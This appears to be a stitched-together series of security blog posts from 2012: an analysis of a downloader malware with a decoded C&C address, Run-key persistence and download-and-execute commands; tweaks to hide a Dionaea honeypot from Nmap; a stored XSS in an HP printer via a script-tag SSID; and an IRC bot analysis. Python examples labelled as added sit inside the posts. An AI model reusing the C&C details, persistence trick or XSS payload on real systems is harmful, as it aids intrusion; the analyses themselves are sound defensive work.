<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheHxRGE7xddH9fMd8XAc6bhg89zD0cD9dIajbhsbMIMTefFkLt7dFV7D1HT75zXrQsPoOp9E-P7Sosgq_duf7ydOUDhM1QCDxAqm8yZ3JJ7BfJED154j8FYTBoletCRQo9AYhdFUb7Zhcd/s1600/jmp_mid_instruction.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheHxRGE7xddH9fMd8XAc6bhg89zD0cD9dIajbhsbMIMTefFkLt7dFV7D1HT75zXrQsPoOp9E-P7Sosgq_duf7ydOUDhM1QCDxAqm8yZ3JJ7BfJED154j8FYTBoletCRQo9AYhdFUb7Zhcd/s1600/jmp_mid_instruction.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Malware features</h2>
<div style="text-align: justify;">
After unpacking, this binary is in fact a simple downloader. The binary tries to confuse IDA with lots of "JZ/JNZ" jump pairs. In fact, nearly all jumps use this trick.</div>
<div style="text-align: justify;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4x1Duxjsih0gc3v2ysf85sVayF_4VEzFGn3a8IUMs_D56x4Bfns6LleVUdYbsNTOOGgCOyxuxDrPWNhHbLHApPJFBm7-7mH53T-tQhihJoAXbHPlpaDXIQSfIDEJEomgEKWVzs0uGXqO/s1600/unpacked_anti-disasm.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4x1Duxjsih0gc3v2ysf85sVayF_4VEzFGn3a8IUMs_D56x4Bfns6LleVUdYbsNTOOGgCOyxuxDrPWNhHbLHApPJFBm7-7mH53T-tQhihJoAXbHPlpaDXIQSfIDEJEomgEKWVzs0uGXqO/s400/unpacked_anti-disasm.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IDA confused</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1iTgz1Zmh0hS_eVoXmJdTwkEnmrFFKzybqkn_dtZiMeV_6YTwlkEk8yT6Y8UHKQmG7kzbxNnIwVntnuNAmIfaRc3TVzbMIGMmbN93pj0v_FgdxltsLSHnv3jyNhwo2oQTXsxAk67qh_Kw/s1600/unpacked_anti-disasm2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1iTgz1Zmh0hS_eVoXmJdTwkEnmrFFKzybqkn_dtZiMeV_6YTwlkEk8yT6Y8UHKQmG7kzbxNnIwVntnuNAmIfaRc3TVzbMIGMmbN93pj0v_FgdxltsLSHnv3jyNhwo2oQTXsxAk67qh_Kw/s400/unpacked_anti-disasm2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Disassembly fixed</td></tr>
</tbody></table>
<div style="text-align: justify;">
The first function called by the unpacked code resolves the addresses of network functions. The "<i>wininet.dll</i>" library is loaded at runtime with <i>LoadLibrary</i>, and then the addresses of the <i>InternetOpenUrlA, InternetOpenA, InternetCloseHandle</i> and <i>InternetReadFile</i> functions are resolved thanks to <i>GetProcAddress</i>. The address of <i>UrlDownloadToFileA</i> from "<i>urlmon.dll</i>" is also resolved with the same method.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The second function ensures reboot persistence for the malware. In order to run after a reboot, the malware adds an entry to the registry :</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]</div>
<div style="text-align: justify;">
"McUpdate"="&lt;path_to_this_malware&gt;"</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The key and value names are not stored in clear text in the file but are encoded with a XOR algorithm. The following Python script decodes all the encoded strings used in this binary :</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<script src="https://gist.github.com/steeve85/5281785.js"></script><br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then the malware contacts its C&C to get an order. The URL is encoded with the aforementioned algorithm; after decoding, it is : http://216.15.210.68/197.1.16.3_7.html. The User-Agent used to connect to the C&C is also decoded at runtime : "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)". If it can't contact the C&C, the malware waits 10 minutes before retrying. After 3 failed attempts to get a command from the C&C, the binary ends its execution.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Commands on the C&C server are placed between the "&lt;!-- DOCHTML" and "--&gt;" HTML comment tags. These two tags, like the following commands, are also encoded in the binary. The command can be one of the following :</div>
<div style="text-align: justify;">
- Ausov : exit the program</div>
<div style="text-align: justify;">
- Author X : wait X * 10 minutes</div>
<div style="text-align: justify;">
- http://url : URL used to download and execute another binary.</div>
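<div style="text-align: justify;">
The command protocol just described, as an added example that is not the author's script or the malware's code: a Python parser that extracts the command from a fetched page and reproduces the retry rules (10-minute wait, exit after 3 failures), as an analyst would use in a C&C emulator or sandbox. The sample pages and the "example.invalid" URL are constructed; treating a page without a recognisable command as a failure is an assumption the post does not state.</div>

```python
import re

# Command delimiters described in the analysis (stored XOR-encoded in the binary).
# The opener is assembled from two pieces so that this listing does not itself
# contain an HTML comment opener when it is embedded in a web page.
CMD_OPEN = "<" + "!-- DOCHTML"
CMD_CLOSE = "-->"

RETRY_DELAY_MINUTES = 10  # wait between failed C&C contacts
MAX_FAILURES = 3          # the downloader exits after this many failures


def extract_command(html):
    """Return the text between the first CMD_OPEN and the next CMD_CLOSE, or None."""
    start = html.find(CMD_OPEN)
    if start < 0:
        return None
    start += len(CMD_OPEN)
    end = html.find(CMD_CLOSE, start)
    if end < 0:
        return None
    return html[start:end].strip()


def classify_command(cmd):
    """Map a raw command string to (kind, argument) using the three documented forms."""
    if cmd is None:
        return ("none", None)
    if cmd == "Ausov":
        return ("exit", None)
    m = re.fullmatch(r"Author\s+(\d+)", cmd)
    if m:
        return ("sleep", int(m.group(1)) * 10)  # value is in minutes
    if cmd.lower().startswith("http://"):
        return ("download", cmd)
    return ("unknown", cmd)


class BeaconState:
    """Reproduces the documented retry behaviour for an analyst's C&C emulator.

    Assumption (not stated in the post): a page without a recognisable command
    counts as a failure, exactly like an unreachable server."""

    def __init__(self):
        self.failures = 0

    def on_response(self, html):
        """html is None when the C&C could not be contacted."""
        if html is None:
            kind, arg = "none", None
        else:
            kind, arg = classify_command(extract_command(html))
        if kind in ("none", "unknown"):
            self.failures += 1
            if self.failures >= MAX_FAILURES:
                return ("exit", None)
            return ("sleep", RETRY_DELAY_MINUTES)
        return (kind, arg)


# Constructed C&C pages (the real C&C content is not known).
SAMPLE_PAGE_SLEEP = "<html><body>news" + CMD_OPEN + " Author 3 " + CMD_CLOSE + "</body></html>"
SAMPLE_PAGE_EXIT = "<html>" + CMD_OPEN + " Ausov " + CMD_CLOSE + "</html>"
SAMPLE_PAGE_DOWNLOAD = CMD_OPEN + " http://example.invalid/update.dat " + CMD_CLOSE
SAMPLE_PAGE_EMPTY = "<html><body>nothing here</body></html>"

if __name__ == "__main__":
    for page in (SAMPLE_PAGE_SLEEP, SAMPLE_PAGE_EXIT, SAMPLE_PAGE_DOWNLOAD, SAMPLE_PAGE_EMPTY):
        print(classify_command(extract_command(page)))
```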
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
When the last command is received from the C&C, the file pointed to by the URL is downloaded to the temporary folder thanks to the <i>UrlDownloadToFile</i> function. As the downloaded file can be compressed with the <a class="vt-p" href="http://en.wikipedia.org/wiki/Lempel-Ziv-Welch" target="_blank">Lempel-Ziv</a> algorithm, the malware opens it with <i>LZOpenFile</i>. Another file is created with nearly the same path as the first one : the ".exe" extension is appended. Then the content of the first (downloaded) file is copied (and decompressed if necessary) to the second one thanks to the <i>LZCopy</i> function.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After that, the copied (and uncompressed) file is executed with <i>CreateProcessA</i>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After analysis, the aim of this malware is simple : download and execute (more advanced?) binaries on the victim's computer. This malware seems to belong to the WEBC2-AUSOV family defined by Mandiant, as "Ausov" is a command of this sample.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I have not been able to identify the packer used. So if you recognise it, feedback will be welcome ;-)</div>
<div style="text-align: justify;">
<br /></div>
<h2>
Make Dionaea stealthier for fun and no profit</h2>
Posted by Steeve Barbeau on 2012-06-10.<br />
<div style="text-align: justify;">
I'm in my "honeypot playing period" and I've tried to scan my <a class="vt-p" href="http://dionaea.carnivore.it/" target="_blank">Dionaea</a> with Nmap, which of course detects lots of listening ports but, more annoyingly, recent versions of Nmap are able to see that some services are provided by Dionaea ...</div>
<br />
<script src="https://gist.github.com/2902618.js?file=dionaea_scan1">
</script><br />
<br />
<div style="text-align: justify;">
So if you want your honeypot to be stealthier, you can apply some tricks. Before modifying the behaviour of Dionaea's services, you have to know how Nmap's service fingerprinting feature works (I will only talk about Nmap, because it is the most used port scanner; it's up to you to try with others).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to discover the name and version of a service, Nmap uses Perl Compatible Regular Expressions. All these regexps are stored in <i>/usr/share/nmap/nmap-service-probes</i> (the path can change depending on the OS). If you want to understand the syntax of the nmap-service-probes file, I recommend reading <a class="vt-p" href="http://nmap.org/book/vscan-fileformat.html" target="_blank">this</a>. Below are some probes extracted from this file :</div>
<br />
<script src="https://gist.github.com/2902651.js?file=nmap_probes">
</script><br />
<br />
<div style="text-align: justify;">
So if we want to hide our Dionaea honeypot from Nmap users, we have to modify Dionaea's behaviour so that Nmap's probes no longer match. First, list all the Dionaea probes in this file :</div>
<br />
[steeve@omega ~]$ <i>cat /usr/share/nmap/nmap-service-probes | grep Dionaea</i><br />
<br />
<script src="https://gist.github.com/2902656.js?file=dionaea_probes">
</script><br />
<br />
<div style="text-align: justify;">
We can see that Nmap is able to detect "only" 4 services offered by Dionaea : FTP, HTTP, MSSQL and SMB. I will show you how we can deceive Nmap by modifying a few files in Dionaea. I won't show you how to tweak the MSSQL service because I haven't dug deeper and this service looks a bit more complicated ... (If you have a solution, you can send me a mail or share it in the comments :-) </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
First, if we look at the FTP probe, we can see that Nmap only checks the connection banner. So we just have to change it, and Nmap will fail to retrieve the service name and version. Of course we can put any banner, but the best thing to do (in my opinion) is to try to act like a real <a class="vt-p" href="http://en.wikipedia.org/wiki/List_of_FTP_server_software" target="_blank">FTP server</a>. Shodan is a great tool to help us know how to simulate FTP servers; check <a class="vt-p" href="http://www.shodanhq.com/search?q=+port%3A21" target="_blank">this link</a>. I have chosen to use the MS FTP banner : "<i>Microsoft FTP Service</i>".</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So we have to edit the FTP Python file located at <i>/opt/dionaea/lib/dionaea/python/dionaea/ftp.py</i>. Now you just have to replace "Welcome to the ftp service" with the banner of your choice :</div>
<br />
<script src="https://gist.github.com/2902800.js?file=nmap_dionaea_ftp">
</script><br />
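<div style="text-align: justify;">
To see why the banner change works, here is an added Python example (not from the original post, nor from Dionaea or Nmap) that parses "match" lines in nmap-service-probes syntax and applies them to a banner the way Nmap does: first match wins, and $1-style back-references in the version fields are expanded. The three probe lines are constructed for the example; the first encodes the default Dionaea banner quoted above, while the Microsoft FTP and vsftpd lines are assumptions, not copies from Nmap's file.</div>

```python
import re

# Start of a match line: "match <service> m<delim>" (also accepts "softmatch").
MATCH_LINE = re.compile(r"^(?:soft)?match\s+(\S+)\s+m(.)")


def parse_match_line(line):
    """Parse one nmap-service-probes 'match' line into a dict with a compiled regex.

    Assumes the regex delimiter does not occur inside the regex (Nmap picks a
    delimiter that does not) and that version-info fields use '/' delimiters."""
    head = MATCH_LINE.match(line)
    if not head:
        raise ValueError("not a match line: %r" % line)
    service, delim = head.group(1), head.group(2)
    pattern, rest = line[head.end():].split(delim, 1)
    flag_chars = re.match(r"[is]*", rest).group(0)  # i = IGNORECASE, s = DOTALL
    flags = (re.IGNORECASE if "i" in flag_chars else 0) | (re.DOTALL if "s" in flag_chars else 0)
    # Version-info fields: p/product/ v/version/ i/info/ h/hostname/ o/os/ d/device/
    info = dict(re.findall(r"\s([pvihod])/([^/]*)/", rest[len(flag_chars):]))
    return {"service": service, "regex": re.compile(pattern, flags), "info": info}


def fingerprint(banner, probes):
    """Return the first probe whose regex matches the banner (Nmap semantics), or None."""
    for probe in probes:
        if probe["regex"].search(banner):
            return probe
    return None


def describe(banner, probes):
    """Resolve the version-info fields for a banner, expanding $1..$9 back-references."""
    probe = fingerprint(banner, probes)
    if probe is None:
        return None
    m = probe["regex"].search(banner)
    out = {"service": probe["service"]}
    for key, value in probe["info"].items():
        out[key] = re.sub(r"\$(\d)", lambda g: m.group(int(g.group(1))), value)
    return out


# Constructed probe lines in nmap-service-probes syntax (not copied from Nmap's file);
# the first one encodes the default Dionaea FTP banner quoted in the post.
PROBES = [parse_match_line(l) for l in [
    r"match ftp m/^220 Welcome to the ftp service\r\n/ p/Dionaea honeypot ftpd/",
    r"match ftp m/^220 Microsoft FTP Service\r\n/ p/Microsoft ftpd/ o/Windows/",
    r"match ftp m/^220 \(vsFTPd (\d[\d.]+)\)\r\n/ p/vsftpd/ v/$1/ o/Unix/",
]]

DIONAEA_DEFAULT_BANNER = "220 Welcome to the ftp service\r\n"
DIONAEA_TWEAKED_BANNER = "220 Microsoft FTP Service\r\n"

if __name__ == "__main__":
    print(describe(DIONAEA_DEFAULT_BANNER, PROBES))  # identified as the honeypot
    print(describe(DIONAEA_TWEAKED_BANNER, PROBES))  # now looks like Microsoft ftpd
```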
<br />
<div style="text-align: justify;">
If we check the HTTP Nmap probe, we can see that it is a static one: no regexp is used. This probe is based on the HTTP headers and the HTML source code. There are at least two simple solutions. The HTTP service lists the directory content, so first we can simply put a file in the <i>/opt/dionaea/var/dionaea/wwwroot</i> directory: the HTML source code will then be different and won't match the probe anymore. The second solution is to modify the HTML code sent by Dionaea in <i>/opt/dionaea/lib/dionaea/python/dionaea/http.py</i>. For example, in list_directory(), we can change the DTD, the page title ...</div>
<br />
<script src="https://gist.github.com/2902817.js?file=nmap_dionaea_http">
</script><br />
<br />
<div style="text-align: justify;">
The SMB probe provided by Nmap is based on the values of two fields of the SMB Negotiate Protocol Response : "OemDomainName" and "ServerName". Nmap expects to receive respectively "WORKGROUP" and "HOMEUSER-XXXXXX", where X represents random data. It seems quite easy to mislead Nmap on the SMB service too. We just have to modify those values in the SMB_Negociate_Protocol_Response class of the file <i>/opt/dionaea/lib/dionaea/python/dionaea/smb/include/smbfields.py</i>. Let's try with "HINMAP" and "TRYHARDER".</div>
<br />
<script src="https://gist.github.com/2902847.js?file=nmap_dionaea_smb">
</script><br />
<br />
<div style="text-align: justify;">
You can see the results of our tricks just below. Sure, it's not perfect but it's better than nothing ;-)</div>
<div style="text-align: justify;">
<br /></div>
<script src="https://gist.github.com/2902861.js?file=nmap_scan2">
</script><br />
<br />
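To see why swapping a banner is enough, here is an added example (not code from this post, from Dionaea or from Nmap) that re-implements the core of Nmap's match-line logic; the match lines are constructed in nmap-service-probes syntax and only approximate real entries, and the banners are constructed too, so you can test a candidate banner before editing ftp.py or http.py.

```python
"""Replay Nmap-style service-probe matching against honeypot banners.

Added example: not code from the post, from Dionaea or from Nmap. It
re-implements the core of Nmap's 'match' directive so a banner can be
checked for fingerprinting before it is served. The match lines below
are constructed in nmap-service-probes syntax and only approximate real
entries; the sample banners are constructed as well.
"""
import re
from dataclasses import dataclass

# Syntax mimicked: match <service> m<delim>regex<delim>[flags] [p/product/ ...]
PROBE_MATCHES = r"""
match ftp m|^220 Welcome to the ftp service\r\n| p/Dionaea honeypot ftpd/
match ftp m|^220 Microsoft FTP Service\r\n| p/Microsoft ftpd/
match http m|^HTTP/1\.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html>\n<title>Directory listing| p/Dionaea honeypot httpd/
"""

MATCH_LINE = re.compile(r"^match\s+(\S+)\s+m(.)(.*?)\2([is]*)\s*(.*)$")
FIELD = re.compile(r"\b([pvhoid])/(.*?)/")


@dataclass
class Match:
    service: str
    regex: re.Pattern
    fields: dict


def parse_matches(text):
    """Parse 'match' lines; any other directive type is skipped."""
    matches = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("match "):
            continue
        m = MATCH_LINE.match(line)
        if m is None:
            raise ValueError(f"cannot parse: {line!r}")
        service, _delim, pattern, flags, rest = m.groups()
        re_flags = (re.IGNORECASE if "i" in flags else 0) | (re.DOTALL if "s" in flags else 0)
        matches.append(Match(service, re.compile(pattern, re_flags), dict(FIELD.findall(rest))))
    return matches


MATCHES = parse_matches(PROBE_MATCHES)


def fingerprint(banner, matches=MATCHES):
    """First (service, product) whose regex hits the banner, else None."""
    if isinstance(banner, bytes):
        banner = banner.decode("latin-1")   # match on raw octets, like Nmap
    for m in matches:
        if m.regex.search(banner):
            return m.service, m.fields.get("p", "")
    return None


# Constructed banners: Dionaea's default FTP greeting (quoted in the post),
# the replacement chosen in the post, and a directory listing response.
DIONAEA_FTP = b"220 Welcome to the ftp service\r\n"
PATCHED_FTP = b"220 Microsoft FTP Service\r\n"
DIONAEA_HTTP = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
                b"<html>\n<title>Directory listing for /</title>")

if __name__ == "__main__":
    for b in (DIONAEA_FTP, PATCHED_FTP, DIONAEA_HTTP,
              DIONAEA_HTTP.replace(b"Directory listing", b"Index of")):
        print(repr(b[:40]), "->", fingerprint(b))
```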
<div style="text-align: justify;">
In this blog post, I've shown you how to use Nmap probes to "protect" your honeypot, but you can do the opposite and add new probes to get a more powerful Nmap. In addition, it would be interesting to modify the MSSQL behaviour and the SSL certificates to obtain a less verbose honeypot (look at the first scan for the SSL certificate details).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
FYI : Markus, Dionaea's creator, won't fix Dionaea regarding Nmap (or other scanners) detection. It's a cat-and-mouse game that he can't win because some protocols are tricky to implement and modify whereas Nmap probes are very easy to add. You can read <a class="vt-p" href="http://sourceforge.net/mailarchive/message.php?msg_id=29067712" target="_blank">this mail</a> on the Nepenthes mailing list.</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div><br />XSS on HP printer web interface (2012-04-23)<div style="text-align: justify;">
Yesterday I was watching a Defcon 19 <a class="vt-p" href="http://www.securitytube.net/video/2994" target="_blank">talk</a> about multi-function printer security which was pretty fun. So this gave me an idea : what about mine ? Of course, I don't have a professional printer that can be connected to an LDAP directory or whatever, but my printer (HP Deskjet 3070A) has network access too :)</div>
<div style="text-align: justify;">
<br /></div>
According to Nmap, lots of TCP ports seem open :<br />
<br />
<i>Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-22 21:16 CEST
</i><br />
<i>Nmap scan report for HP7D7AA8 (192.168.1.23)</i><br />
<i>Host is up (0.28s latency).</i><br />
<i>Not shown: 65520 closed ports</i><br />
<i>PORT STATE SERVICE</i><br />
<i>80/tcp open http</i><br />
<i>443/tcp open https</i><br />
<i>631/tcp open ipp</i><br />
<i>3910/tcp open unknown</i><br />
<i>3911/tcp open unknown</i><br />
<i>6839/tcp open unknown</i><br />
<i>7435/tcp open unknown</i><br />
<i>8080/tcp open http-proxy</i><br />
<i>9100/tcp open jetdirect</i><br />
<i>9101/tcp open jetdirect</i><br />
<i>9102/tcp open jetdirect</i><br />
<i>9110/tcp open unknown</i><br />
<i>9111/tcp open DragonIDSConsole</i><br />
<i>9112/tcp open unknown</i><br />
<i>9220/tcp open unknown</i><br />
<i>9290/tcp open unknown</i><br />
<i>MAC Address: 2C:76:8A:7D:7A:A8 (Unknown)</i><br />
<i>Nmap done: 1 IP address (1 host up) scanned in 855.57 seconds</i><br />
<br />
Ok cool, let's see the HTTP server and the Web interface ...<br />
<br />
The printer's HTTP Server header is too verbose, it looks like :<br />
<br />
<i>HP HTTP Server; HP Deskjet 3070 B611 series - 012345; Serial Number: 0123456789ABCD; Munich_mp1 Built:Thu Apr 28, 2011 03:49:36PM {0123456789ABC, ASIC id 0x00340100}</i><br />
<br />
Yes we can get the serial number from the HTTP Server header :)<br />
<br />
<br />
<div style="text-align: justify;">
Now if we take a look at the web interface, we can find a fun XSS. As this printer is Wifi capable, we can configure Wifi using this interface. But what about a cool SSID like "<i>&lt;script&gt;alert('owned?')&lt;/script&gt;</i>" ? </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I'll let you set up your AP with the aforementioned SSID. Note that you can use an Android phone, it's quick and easy to configure :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As soon as this Wifi AP is set up, you can configure your printer to use it : Network > Wireless Setup Wizard (<i>https://&lt;IP&gt;/#hId-setupPage</i>).</div>
<br />
<br />
Click on "Start Wizard" :<br />
<br />
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7fEjfuVpwrRjTfBvsCB6vWAcTbFcHLgnDgnBCyIBp3Zh_qVKvYaxP-ACPchbpLePU8aIlwqlHNnUI42NyDf7JF1a9o5b0u6rZD916dhcWCeqYxqSq_tWSMqR2QyO0OgpULTxHZ3rzvlxr/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7fEjfuVpwrRjTfBvsCB6vWAcTbFcHLgnDgnBCyIBp3Zh_qVKvYaxP-ACPchbpLePU8aIlwqlHNnUI42NyDf7JF1a9o5b0u6rZD916dhcWCeqYxqSq_tWSMqR2QyO0OgpULTxHZ3rzvlxr/s400/1.png" width="400" /></a><br />
<br />
We can see our new AP :<br />
<br />
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijiOzL4A0YECJY7foXM3CN6_gho-Jov5YrOI9IUo14wTQeVN7rf7E1Rs68FXGxu6KM42xazzSqH2s2yCw5kUu3UcRFKLybVOQaWlHc42JDH01Iojd6I6BzRbZtRL5F68b-F0iManJYw36C/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijiOzL4A0YECJY7foXM3CN6_gho-Jov5YrOI9IUo14wTQeVN7rf7E1Rs68FXGxu6KM42xazzSqH2s2yCw5kUu3UcRFKLybVOQaWlHc42JDH01Iojd6I6BzRbZtRL5F68b-F0iManJYw36C/s400/2.png" width="400" /></a><br />
<br />
Now if we select it and click on "Next", we get our XSS :D<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj75mO5OOLIBKp1UhEw2o5wMOtxGTZ_LxXYOOQB5g5jLGz4ZBO6y7QMS8fZxRJ9jvM7sqrIfLvxCQAumq5pdvwY3GlCQ7yJE25HnBbOpceZ_8Wyb_ohSGFpjk8blM_QOH9PmfkMZLPeiwRX/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj75mO5OOLIBKp1UhEw2o5wMOtxGTZ_LxXYOOQB5g5jLGz4ZBO6y7QMS8fZxRJ9jvM7sqrIfLvxCQAumq5pdvwY3GlCQ7yJE25HnBbOpceZ_8Wyb_ohSGFpjk8blM_QOH9PmfkMZLPeiwRX/s400/3.png" width="400" /></a></div>
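What the wizard page should have done with the SSID, as an added example that is not the printer's firmware: the scanned network names (constructed test data, including the SSID used above and one with a non-UTF-8 byte) are rendered once raw and once escaped for each HTML context.

```python
"""Vulnerable vs. hardened rendering of the Wi-Fi network list.

Added example, not the printer's firmware. It models the wireless setup
wizard page described above: SSIDs returned by a scan are inserted into
HTML once as-is (what the printer apparently does) and once escaped for
each HTML context. The SSIDs are constructed test data.
"""
import html

# An SSID is up to 32 arbitrary octets, so the scan hands us bytes.
SCAN_RESULTS = [
    b"HomeNet",
    b"<script>alert('owned?')</script>",   # the SSID used in the post
    b'caf\xe9 "guest"',                     # non-UTF-8 byte plus double quotes
]


def ssid_to_text(ssid: bytes) -> str:
    """Decode defensively: an SSID need not be valid UTF-8."""
    return ssid.decode("utf-8", errors="replace")


def render_vulnerable(ssids):
    """Raw interpolation: whatever the access point broadcast lands in the DOM."""
    rows = []
    for s in ssids:
        name = ssid_to_text(s)
        rows.append(f'<label><input type="radio" name="ssid" value="{name}"> {name}</label>')
    return "<form>\n" + "\n".join(rows) + "\n</form>"


def render_hardened(ssids):
    """Escape per context: quoted attribute value and text node."""
    rows = []
    for s in ssids:
        name = ssid_to_text(s)
        attr = html.escape(name, quote=True)    # & < > " '
        text = html.escape(name, quote=False)   # & < >
        rows.append(f'<label><input type="radio" name="ssid" value="{attr}"> {text}</label>')
    return "<form>\n" + "\n".join(rows) + "\n</form>"


def has_script_tag(page: str) -> bool:
    """Did a <script> tag survive into the generated markup?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(SCAN_RESULTS))
    print(render_hardened(SCAN_RESULTS))
```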
<br /><br />Caught and analyzed (2012-01-29)<div style="text-align: justify;">
Last September, I was playing with the Dionaea honeypot, which is a great tool (<a class="vt-p" href="http://steeve-barbeau.blogspot.com/2011/10/some-stats-of-my-dionaea-honeypot.html" target="_blank">see previous article</a>). After having caught some malware samples, I wanted to analyse one of them.</div>
<div>
<div style="text-align: justify;">
<br /></div>
<br />
<b><span style="font-size: large;">Information about the file</span></b></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
According to the VirusTotal <a class="vt-p" href="http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477" target="_blank">report</a>, the file I've chosen to analyze is an IRC bot. VT shows an interesting piece of information : the malware seems to be packed with PolyCrypt. In fact the packer version is exactly PolyCrypt PE 2.1.5. During the analysis I found this string relating to the packer software : "PolyCrypt PE (c) 2004-2005, JLabSoftware.".</div>
</div>
<div>
<br /></div>
<div>
After unpacking, we can take a look at the imported DLLs and functions : <a class="vt-p" href="http://pastebin.com/gfUar4Pt" target="_blank">details here</a></div>
<div>
<br />
And now we can start the real work : reversing the malware !<br />
<br />
<br />
<b><span style="font-size: large;">Let's start the analysis</span></b><br />
<br />
<a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUvVKYLzse6EuOgXs9_1V3pk9mWMvkqLDs0CiMFyflSdPbqG_owo7kqqaWZRIuVlZryo-LCk3AQXOsTI-SugqoMQn7DwK9zJkg55gfFWBgNoFPCKsbkoScjat1t7ifFOWTWyC5O7xBlMAk/s1600/Screen+Shot+2011-11-13+at+9.41.14+PM.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUvVKYLzse6EuOgXs9_1V3pk9mWMvkqLDs0CiMFyflSdPbqG_owo7kqqaWZRIuVlZryo-LCk3AQXOsTI-SugqoMQn7DwK9zJkg55gfFWBgNoFPCKsbkoScjat1t7ifFOWTWyC5O7xBlMAk/s320/Screen+Shot+2011-11-13+at+9.41.14+PM.png" width="320" /></a><br />
<div style="text-align: justify;">
At startup, the malware creates a script file located at <i>c:\a.bat.</i> The script can be downloaded <a class="vt-p" href="http://pastebin.com/Nf4v50Z6" target="_blank">here</a>.</div>
<br />
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
The script creates the file 1.reg in the temp directory (c:\Documents and Settings\%user%\Local Settings\Temp), then runs regedit with the created reg file before deleting 1.reg and itself.</div>
<div style="text-align: justify;">
The reg file disables DCOM and RemoteConnect, restricts anonymous access, disables the admin shares (for example C$), changes a lot of TCP/IP parameters and increases the number of possible simultaneous connections to a single HTTP 1.0/1.1 server (50 and 50 instead of respectively 4 and 2). It's obvious that the aim of this last registry modification is to increase DoS effects.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
